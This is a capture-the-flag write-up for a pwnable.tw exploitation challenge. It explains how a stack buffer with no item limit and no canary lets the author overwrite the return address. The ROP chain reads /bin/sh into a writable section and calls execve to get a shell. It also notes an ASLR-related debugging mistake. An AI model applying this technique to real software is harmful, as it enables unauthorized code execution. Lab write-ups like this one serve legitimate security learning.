This is a magic box.
nc pwning.pwnable.tw 56746
This program let us put “items” (16 bytes arbitrary user input) to the “box” (buffer located on the stack). However, it neither confines the amount of items nor enables the canary. Therefore, we can override the return address and inject our ROP chain. Moreover, this program is statically linked, so we can easily collect enough ROP gadgets.
I use ROPgadget to find out the gadgets needed. Then, I craft a ROP chain which reads
/bin/sh to the free buffer located at
.bss section and use it as the argument of
sys_execve to spawn a shell.
from pwnlib.tubes.remote import remote
At first, I assigned
free_buf = 0xffffd000 because I assumed it is an unused memory of the stack. However, I got the following error:
set_thread_area failed when setting up thread-local storage
I think it is due to the ASLR, which makes the stack address different every time. The address
0xffffd000 is only valid in
gdb and generally unallocated. The section
.got may be a better choice of the free buffer.